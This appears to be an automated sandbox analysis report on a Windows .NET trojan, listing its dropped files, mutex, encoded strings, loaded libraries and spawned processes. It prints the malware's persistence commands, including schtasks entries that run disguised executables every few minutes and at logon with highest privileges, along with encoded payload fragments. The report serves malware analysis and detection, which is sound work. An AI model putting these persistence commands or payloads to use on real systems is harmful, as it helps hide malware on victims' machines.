Source: k1iZHyRK6K.exe, Class16.cs	Base64 encoded string: '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
Source: k1iZHyRK6K.exe, x2I.cs	Base64 encoded string: 'YPfGxzlcc4Mm2vDh6NX26vfd1K/QW1nNT6x6Rx9h2os7oFZG5MwS/Ex2posFWsjEPx0l0DNDGgTS4FhSts90aAwGrC0TCH24Hz29woW+TujxbJ3ifeuJBFUzNEpcDBqWWAT12rRLwdu3CeQQQkr7IQ=='

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@54/58@2/2

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

File created: C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe

Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

File created: C:\Users\user\Desktop\cbCbMxmL.log

Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-2hFQuLJGsb7uyNm7Vrhw

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

File created: C:\Users\user\AppData\Local\Temp\rsqbzofw

Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\YzuQZSWjCd.bat"

Source: k1iZHyRK6K.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: k1iZHyRK6K.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: k1iZHyRK6K.exe	ReversingLabs: Detection: 73%
Source: k1iZHyRK6K.exe	Virustotal: Detection: 65%

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

File read: C:\Users\user\Desktop\k1iZHyRK6K.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\k1iZHyRK6K.exe "C:\Users\user\Desktop\k1iZHyRK6K.exe"
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe'" /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5941.tmp" "c:\Windows\System32\CSCC093A9EE2E0C4098883B2A265DAA859.TMP"
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe'" /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows multimedia platform\lMBSkpoWMYaHkUMNHfb.exe'" /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows multimedia platform\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 14 /tr "'C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe'" /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 5 /tr "'C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe'" /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "k1iZHyRK6Kk" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\k1iZHyRK6K.exe'" /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "k1iZHyRK6K" /sc ONLOGON /tr "'C:\Users\user\Desktop\k1iZHyRK6K.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "k1iZHyRK6Kk" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\k1iZHyRK6K.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Users\user\Desktop\k1iZHyRK6K.exe C:\Users\user\Desktop\k1iZHyRK6K.exe
Source: unknown	Process created: C:\Users\user\Desktop\k1iZHyRK6K.exe C:\Users\user\Desktop\k1iZHyRK6K.exe
Source: unknown	Process created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\YzuQZSWjCd.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\k1iZHyRK6K.exe "C:\Users\user\Desktop\k1iZHyRK6K.exe"
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JanKBv1Gj5.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Users\user\Desktop\k1iZHyRK6K.exe "C:\Users\user\Desktop\k1iZHyRK6K.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Source: unknown	Process created: C:\Users\user\Desktop\k1iZHyRK6K.exe "C:\Users\user\Desktop\k1iZHyRK6K.exe"
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\YzuQZSWjCd.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5941.tmp" "c:\Windows\System32\CSCC093A9EE2E0C4098883B2A265DAA859.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\k1iZHyRK6K.exe "C:\Users\user\Desktop\k1iZHyRK6K.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JanKBv1Gj5.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
